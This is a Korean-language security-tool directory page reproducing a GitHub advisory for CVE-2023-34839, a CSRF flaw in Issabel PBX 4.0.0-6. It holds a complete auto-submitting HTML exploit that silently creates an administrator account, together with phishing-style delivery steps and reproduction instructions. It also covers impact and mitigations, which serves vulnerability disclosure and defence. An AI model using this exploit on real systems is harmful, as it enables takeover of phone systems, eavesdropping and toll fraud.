Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-34839 — CVE-2023-34839는 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다. | Kitploit
도구/GitHubGitHub/sahiloj/cve-2023-34839
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839는 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다.

저장소 보기
536개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF를 통한 권한 상승

CVE Severity CVSS Affected Version


목차

  • 개요
  • 취약점 세부 정보
  • 영향을 받는 소프트웨어
  • CVSS 점수
  • 공격 시나리오
  • 개념 증명(PoC)
  • 재현 단계
  • 영향
  • 해결 방법
  • 참고 자료
  • 면책 조항

개요

CVE-2023-34839는 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다. 이 취약점은 사용자 관리 엔드포인트에 존재하며, 인증되지 않은 원격 공격자가 현재 인증된 관리자를 속여 특수하게 제작된 웹페이지를 방문하게 함으로써 새 관리자 계정을 은밀히 생성할 수 있게 합니다.


취약점 세부 정보

Issabel PBX 4.0.0-6은 사용자 생성 엔드포인트에서 CSRF 보호 기능(예: 동기화 토큰, SameSite 쿠키 속성, Origin/Referer 헤더 검증)을 구현하지 않습니다:

root@kitploit:~
POST /index.php?menu=userlist&action=new

애플리케이션이 인증을 전적으로 세션 쿠키에만 의존하고 상태 변경 요청 검증을 수행하지 않기 때문에, 어떤 출처에서든 제출된 위조된 POST 요청은 수락되어 로그인된 관리자 세션의 전체 권한으로 처리됩니다.

근본 원인: 상태 변경 관리 엔드포인트에 대한 CSRF 방지 토큰 검증 부재.

취약점 분류: CWE-352 — 사이트 간 요청 위조(CSRF)


영향을 받는 소프트웨어

소프트웨어버전상태
Issabel PBX4.0.0-6취약 ✔
  • 공급업체 홈페이지: https://www.issabel.org/
  • 소스 코드: https://github.com/IssabelFoundation/issabelPBX

CVSS 점수


공격 시나리오

공격자는 다음과 같은 개괄적인 단계를 통해 이 취약점을 악용할 수 있습니다:

  1. 악성 HTML 페이지를 제작합니다. Issabel PBX 사용자 생성 엔드포인트를 대상으로, 공격자가 통제하는 값(사용자 이름, 비밀번호, group = administrator)이 포함된 숨겨진 양식을 만듭니다.
  2. 악성 페이지를 호스팅합니다. 서버에 호스팅하거나 피싱 이메일, 채팅 메시지 또는 모든 사회공학적 경로를 통해 대상 관리자에게 전송합니다.
  3. 관리자가 링크를 열기를 기다립니다. 관리자가 Issabel PBX 애플리케이션에 대한 활성 인증 세션을 유지한 상태에서 말입니다.
  4. 브라우저가 양식을 자동 제출합니다. 피해자의 기존 세션 쿠키를 사용하여 애플리케이션이 새 관리자 계정을 은밀히 생성하게 만듭니다.
  5. 공격자가 새로 생성된 자격 증명으로 로그인합니다. 통화 라우팅, 녹음, SIP 트렁크 구성 및 모든 시스템 설정을 포함한 PBX 시스템에 대한 전체 관리자 액세스 권한을 획득합니다.

피해자는 단 한 번의 페이지 방문 외에 어떤 상호 작용도 필요하지 않습니다.


개념 증명(PoC)

⚠️ 교육 및 승인된 테스트 목적으로만 사용하세요.
localhost를 대상 Issabel PBX 인스턴스의 호스트 이름 또는 IP 주소로 바꾸세요.
자체 서명 인증서가 있는 https:// 엔드포인트에서 테스트하는 경우, 먼저 동일한 브라우저에서 대상 URL을 방문하여 인증서 경고를 수락해야 합니다. 그렇지 않으면 브라우저가 교차 출처 양식 제출을 차단합니다.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

익스플로잇 파일은 이 저장소에서도 확인할 수 있습니다: CSRF Exploit.html


재현 단계

사전 요구 사항

  • 실행 중인 Issabel PBX 4.0.0-6 인스턴스.
  • 활성 브라우저 세션이 있는 관리자 계정.
  • 관리자 세션과 동일한 시스템에 있는 브라우저.

1단계 — 관리자로 Issabel PBX에 로그인

Issabel PBX 웹 인터페이스로 이동하여 관리자 자격 증명으로 로그인합니다.

Issabel PBX 로그인


2단계 — CSRF 익스플로잇 준비

위의 PoC HTML 코드를 복사하여 .html 파일로 저장하고, localhost를 대상 Issabel 인스턴스의 실제 호스트 이름 또는 IP 주소로 바꿉니다.

익스플로잇은 숨겨진 양식 필드를 사용하여 애플리케이션에 새 사용자 생성 요청을 조용히 POST합니다. 페이지가 로드되면 포함된 JavaScript가 사용자의 가시적인 동작 없이 즉시 양식을 제출합니다.

CSRF 익스플로잇 HTML


3단계 — 동일한 브라우저에서 익스플로잇 열기

관리자 세션이 아직 활성 상태인 동안 저장된 HTML 파일을 동일한 브라우저(새 탭)에서 엽니다. 페이지가 로드되면 양식이 즉시 자동 제출됩니다.


4단계 — 새 관리자 계정 생성 확인

Issabel PBX 사용자 관리 패널로 다시 이동합니다. 익스플로잇 페이지를 여는 것 외에 추가 상호 작용 없이 전체 관리자 권한을 가진 새 사용자 계정(이 PoC에서는 CSRF로 명명)이 생성되어 있을 것입니다.

새 관리자 계정 생성됨


영향

CVE-2023-34839를 성공적으로 악용하면 공격자는 다음을 수행할 수 있습니다:

  • PBX 시스템에 불량 관리자 계정을 생성하여 지속적인 전체 권한 액세스를 확보합니다.
  • 통화 라우팅 및 SIP 트렁크를 수정하여 도청이나 통화 요금 사기를 가능하게 합니다.
  • 음성 메일 녹음과 통화 상세 기록(CDR)에 접근하여 민감한 정보가 노출되게 합니다.
  • 비밀번호를 변경하거나 기존 계정을 삭제하여 정당한 관리자를 잠금 처리합니다.
  • PBX 구성을 변경하거나 삭제하여 통신을 방해합니다.

불량 계정은 피해자의 세션이 종료된 후에도 유지되므로, 공격자는 계정이 발견되어 제거될 때까지 무기한 액세스 권한을 유지합니다.


해결 방법

Issabel PBX 관리자와 개발자는 다음 완화 조치를 적용해야 합니다:

  1. CSRF 방지 토큰 구현: 상태를 변경하는 모든 양식에 대해 고유하고 예측할 수 없으며 세션에 연결된 토큰을 생성합니다. 모든 POST 요청을 처리하기 전에 서버 측에서 토큰을 검증합니다.
  2. 세션 쿠키에 SameSite=Strict 또는 SameSite=Lax 적용: 이는 브라우저가 교차 사이트 요청에 쿠키를 보내지 않도록 지시하여, 최신 브라우저에서 전형적인 CSRF 공격을 효과적으로 방지합니다.
  3. Origin 및 Referer 헤더 검증: Origin 또는 Referer 헤더가 예상 애플리케이션 도메인과 일치하지 않는 요청을 거부합니다.
  4. 민감한 작업에 재인증 요구: 새 관리자 수준 계정 생성을 허용하기 전에 관리자에게 현재 비밀번호를 입력하도록 요청합니다.
  5. 최신 보안 패치 적용: 이 CVE를 해결하는 패치를 위해 Issabel 릴리스 페이지와 공식 저장소를 모니터링합니다.

참고 자료

  • NVD — CVE-2023-34839
  • OWASP — 사이트 간 요청 위조(CSRF)
  • CWE-352: 사이트 간 요청 위조
  • Issabel 공식 웹사이트
  • GitHub의 IssabelFoundation/issabelPBX

면책 조항

이 저장소는 교육 목적 및 승인된 보안 연구를 위해서만 제공됩니다. 여기에 제공된 정보와 개념 증명 코드는 소유한 시스템 또는 명시적인 서면 허가를 받은 시스템에 대해서만 사용해야 합니다. 소유하지 않은 시스템에 대한 이 익스플로잇의 무단 사용은 불법이며 형사 기소로 이어질 수 있습니다. 저자는 이 저장소에 포함된 정보의 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드
필드값
CVE IDCVE-2023-34839
날짜2023년 6월 23일
연구자Sahil Ojha
공급업체Issabel
제품Issabel PBX
버전4.0.0-6
테스트 환경Windows
지표값
CVSS v3.1 벡터AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
기본 점수8.8(높음)
공격 경로네트워크
공격 복잡성낮음
필요한 권한없음
사용자 상호작용필요(관리자 방문)
범위변경되지 않음
기밀성높음
무결성높음
가용성높음